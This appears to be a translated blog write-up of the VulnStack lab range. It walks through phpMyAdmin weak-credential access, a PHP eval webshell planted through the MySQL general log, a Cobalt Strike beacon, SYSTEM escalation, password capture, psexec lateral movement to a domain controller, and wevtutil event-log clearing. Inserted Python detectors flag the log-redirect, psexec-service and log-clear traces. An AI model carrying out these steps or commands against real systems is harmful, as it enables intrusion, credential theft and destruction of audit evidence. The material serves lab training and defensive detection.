
[Penetration testing] ATT&CK range one: phpMyAdmin, domain penetration, intranet lateral movement

Popularity: 927 / 2024-09-19 11:18:47

Preface

VulnStack, a knowledge platform built by the Red Sun security team, has the unique advantage of faithfully simulating the real business environment of a domestic enterprise, covering core elements such as a CMS, vulnerability management and domain management. This design comes from the team's deep understanding and skilful application of the ATT&CK red-team assessment model. The range environment and its challenges are built around environment setup, vulnerability exploitation, intranet information collection, lateral movement, penetration channel construction, persistence and trace cleaning, with the aim of giving security researchers a realistic, end-to-end intranet penetration learning environment. Corrections from more experienced readers are welcome; the content is for reference only, please go easy, thank you.


Environment preparation

Download link: /vuln/detail/2/

The Red Sun One range consists of three target machines.


Network topology


First, in the virtual network editor, set the host-only adapter to the 52 segment.


Add a second network card to the Win7 external host so that it can play the role of a public-facing server.


After booting, set the local connection to obtain an IP address automatically. By default it is configured with a static address that does not match our network mode, so it cannot reach the Internet or even the host.


Win2008 is the domain controller; configure it as follows, changing its network mode to host-only.


Win2003 is the domain member.


Booting the environment

The login password is hongrisec@2019 and is the same on all three machines. If you are asked to change the password after logging in, all three machines then use the password you chose. The account name is Administrator on each.

Start the web service on Win7 and the penetration can begin.


Information collection

Host discovery finds the target at .129 (192.168.209.129).


Next, run an nmap port scan against it: ports 80 (HTTP) and 3306 (MySQL) are open.


Browsing to the target's address shows a phpStudy probe page, which discloses the site's absolute path on disk, the administrator's e-mail address, and the fact that remote file inclusion is enabled.


Scrolling down also reveals a MySQL connection check.


The default weak credentials root/root log in successfully.


Using dirb, the directory scanner bundled with Kali, we scan the site:

dirb http://192.168.209.129/


Visiting the discovered pages reveals useful information: the PHP version is 5.4.45.


There is also a phpMyAdmin; log in with the weak credentials found above.


Web penetration

Once in the phpMyAdmin back end, we find that MySQL is not allowed to write files out to disk, and that restriction (secure_file_priv) cannot be changed without first having system privileges.

show variables like "secure%";


So we take the second route: writing through the general query log.

show variables like "%general%";


Because the root account we are using is a DBA user, we can point the general log file at the current site's web root and write a one-line webshell into it. Note that this writes into the log file rather than exporting a file from a query, so secure_file_priv does not need to be "" for it to work.

set global general_log="on";
set global general_log_file="C:/phpStudy/WWW/";


Write the one-line webshell into the log; the query is recorded verbatim and the shell is live.

select "<?php @eval($_POST[10]); ?>";
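The technique just described leaves two things behind that a defender can look for: the SET GLOBAL statements that enable the general log and redirect it under the web root, and a query whose text is PHP code that executes request data. The following Python example is added here; it is not code from the original post or from VulnStack. It scans constructed MySQL general-log lines and audits a SHOW VARIABLES snapshot. The log lines, the file name EXAMPLE.php and the single web root C:/phpStudy/WWW are assumptions made for the example.

```python
import re

# Web roots to protect. Constructed for this example; the site on the page
# lives under C:/phpStudy/WWW, which is the only entry here.
WEB_ROOTS = ["C:/phpStudy/WWW"]

SET_LOG_FILE_RE = re.compile(
    r"set\s+global\s+general_log_file\s*=\s*['\"]?([^'\";]+)", re.I)
SET_LOG_ON_RE = re.compile(
    r"set\s+global\s+general_log\s*=\s*['\"]?(on|1)\b", re.I)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.I)
# PHP functions that execute their argument, fed directly from a request superglobal.
PHP_EXEC_RE = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b",
    re.I)


def _norm(path):
    """Lower-case, forward-slash form without a trailing slash, for prefix tests."""
    return path.strip().replace("\\", "/").rstrip("/").lower()


def under_web_root(path, web_roots=WEB_ROOTS):
    """True if path is a web root itself or lies anywhere beneath one."""
    p = _norm(path)
    return any(p == _norm(r) or p.startswith(_norm(r) + "/") for r in web_roots)


def scan_general_log(lines, web_roots=WEB_ROOTS):
    """Scan MySQL general-query-log lines; return (line_no, reason) findings."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = SET_LOG_FILE_RE.search(line)
        if m and under_web_root(m.group(1), web_roots):
            findings.append((no, "general_log_file redirected into a web root"))
        elif SET_LOG_ON_RE.search(line):
            findings.append((no, "general_log enabled at runtime"))
        if PHP_TAG_RE.search(line) and PHP_EXEC_RE.search(line):
            findings.append((no, "PHP code executing request data inside a query"))
    return findings


def check_variables(variables, web_roots=WEB_ROOTS):
    """Audit a dict built from SHOW VARIABLES output; return a list of issues."""
    issues = []
    if variables.get("general_log", "OFF").upper() in ("ON", "1"):
        issues.append("general_log is ON")
    if under_web_root(variables.get("general_log_file", ""), web_roots):
        issues.append("general_log_file points into a web root")
    if variables.get("secure_file_priv") == "":
        issues.append("secure_file_priv is empty (file export allowed anywhere)")
    return issues


# Constructed sample in MySQL 5.x general-log layout (time, thread id, command, argument).
SAMPLE_LOG = """\
2024-08-25T13:04:48.000000Z\t    3 Connect\troot@localhost on  using TCP/IP
2024-08-25T13:04:48.000000Z\t    3 Query\tshow variables like "secure%"
2024-08-25T13:13:43.000000Z\t    3 Query\tset global general_log="on"
2024-08-25T13:13:59.000000Z\t    3 Query\tset global general_log_file="C:/phpStudy/WWW/EXAMPLE.php"
2024-08-25T13:14:20.000000Z\t    3 Query\tselect "<?php @eval($_POST[10]); ?>"
2024-08-25T13:14:30.000000Z\t    3 Query\tselect count(*) from mysql.user
""".splitlines()


if __name__ == "__main__":
    for no, reason in scan_general_log(SAMPLE_LOG):
        print(f"line {no}: {reason}")
    snapshot = {"general_log": "ON",
                "general_log_file": "C:/phpStudy/WWW/EXAMPLE.php",
                "secure_file_priv": "NULL"}
    for issue in check_variables(snapshot):
        print("variable check:", issue)
```

The variable audit is the cheaper control: a periodic SHOW VARIABLES from a monitoring account catches the redirected log path even if the general log itself was later switched off, and a DBA account that application code does not need is the root cause worth fixing.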


Request the log file in the browser

AntSword connection


Generate a payload with Cobalt Strike (CS)


Upload the payload


Execute the payload and the beacon comes online.


Turn off the firewall; in this lab it makes no difference either way.

shell netsh advfirewall set allprofiles state off


Privilege escalation

Check the current user's privileges: it is a super administrator.

getuid


Run the privilege escalation


Select the listener that points at your Kali server address.


Trying the options one by one, the svc-exe option escalates successfully.


Escalation to SYSTEM privileges succeeded.


Intranet information collection

View the IP addresses

shell ipconfig


List all local users

shell net user


Enumerate computer names

shell net view


Determine whether the host is in a domain

shell net config Workstation


Listing the domains shows a single one, GOD.

shell net view /domain


Use the built-in port scan


Specify the host's other NIC (the intranet segment) and scan with either ARP or ICMP.


Two hosts are found.


Both have port 445 open.


Capture cleartext passwords


Intranet lateral movement

The port scan showed port 445 open, so we can create an SMB listener. (SMB, Server Message Block, is the Windows network file sharing protocol that lets computers on a network access each other's files, printers and similar resources.)

New listener


Show the targets as a list


Locate the domain controller found by the scan and, for lateral movement, select the psexec option.


The configuration is as follows


This gives us the domain controller.


The same works for the other intranet host, since both are in the same domain.


Clear the logs, but be careful to run the commands more than once, since sometimes a log is not fully cleared. The five commands clear the Security, System, Application, Windows PowerShell and Setup event logs respectively:

shell wevtutil cl security
shell wevtutil cl system
shell wevtutil cl application
shell wevtutil cl "windows powershell"
shell wevtutil cl Setup
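The psexec-style move onto the domain controller and the wevtutil clears above each leave a record before anything is wiped: installing a service whose binary lives on an ADMIN$ share produces Service Control Manager event 7045 in the System log, clearing the Security log writes event 1102, and clearing any other log writes event 104, both from the Microsoft-Windows-Eventlog provider. The Python example below is added here and is not code from the original post; it triages a constructed batch of event records for exactly those three signals. The host name DC-HOST, the service name b7f1c2a and the user names are assumptions made for the sample.

```python
import re
from dataclasses import dataclass, field


@dataclass
class Event:
    """Minimal view of a Windows event record: channel, provider, id and EventData."""
    event_id: int
    provider: str
    channel: str
    computer: str
    data: dict = field(default_factory=dict)


# A service binary of the form \\host\ADMIN$\name.exe is the shape left by
# PsExec-style lateral movement: the executable is copied to the admin share
# and registered as a service for one remote start.
ADMIN_SHARE_RE = re.compile(r"^\\\\[^\\]+\\ADMIN\$\\", re.I)


def triage(events):
    """Return (computer, rule, detail) tuples for events that deserve a look."""
    hits = []
    for ev in events:
        if ev.event_id == 1102 and ev.provider == "Microsoft-Windows-Eventlog":
            who = ev.data.get("SubjectUserName", "?")
            hits.append((ev.computer, "security-log-cleared", f"by {who}"))
        elif ev.event_id == 104 and ev.provider == "Microsoft-Windows-Eventlog":
            channel = ev.data.get("Channel", "?")
            who = ev.data.get("SubjectUserName", "?")
            hits.append((ev.computer, "log-cleared", f"{channel} by {who}"))
        elif ev.event_id == 7045 and ev.provider == "Service Control Manager":
            image = ev.data.get("ImagePath", "")
            if ADMIN_SHARE_RE.match(image):
                name = ev.data.get("ServiceName", "?")
                hits.append((ev.computer, "psexec-style-service", f"{name} -> {image}"))
    return hits


def hosts_with_clear_after_service(events):
    """Hosts where a log clear follows a suspicious service install in the batch order.

    A clear on its own is sometimes maintenance; a clear shortly after a remote
    service install on the same host is the combination seen in this walkthrough.
    """
    seen_service = set()
    flagged = set()
    for computer, rule, _ in triage(events):
        if rule == "psexec-style-service":
            seen_service.add(computer)
        elif rule.endswith("log-cleared") and computer in seen_service:
            flagged.add(computer)
    return sorted(flagged)


# Constructed sample, in the order the events would be written on the target.
SAMPLE_EVENTS = [
    Event(7045, "Service Control Manager", "System", "DC-HOST",
          {"ServiceName": "b7f1c2a", "ImagePath": "\\\\127.0.0.1\\ADMIN$\\b7f1c2a.exe",
           "StartType": "demand start", "AccountName": "LocalSystem"}),
    Event(7045, "Service Control Manager", "System", "DC-HOST",
          {"ServiceName": "Spooler", "ImagePath": "C:\\Windows\\System32\\spoolsv.exe",
           "StartType": "auto start", "AccountName": "LocalSystem"}),
    Event(4624, "Microsoft-Windows-Security-Auditing", "Security", "DC-HOST",
          {"LogonType": "3", "TargetUserName": "Administrator"}),
    Event(1102, "Microsoft-Windows-Eventlog", "Security", "DC-HOST",
          {"SubjectUserName": "Administrator"}),
    Event(104, "Microsoft-Windows-Eventlog", "System", "DC-HOST",
          {"Channel": "System", "SubjectUserName": "Administrator"}),
    Event(104, "Microsoft-Windows-Eventlog", "System", "DC-HOST",
          {"Channel": "Application", "SubjectUserName": "Administrator"}),
]


if __name__ == "__main__":
    for computer, rule, detail in triage(SAMPLE_EVENTS):
        print(f"{computer}: {rule} ({detail})")
    print("clear after remote service install on:", hosts_with_clear_after_service(SAMPLE_EVENTS))
```

The 1102 and 104 records are written into the very logs being emptied, which is why a local clear never removes them and why the author notes that the clean-up sometimes does not take; the reliable defence is to forward these channels off the host as they are written, so that the records survive regardless of what is later run on the machine.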


Or simply use the plugin


The network topology view shows every host online.


Summary

I managed to get all three target machines online, hhhhhhh. Masters, please point out any mistakes; thank you.
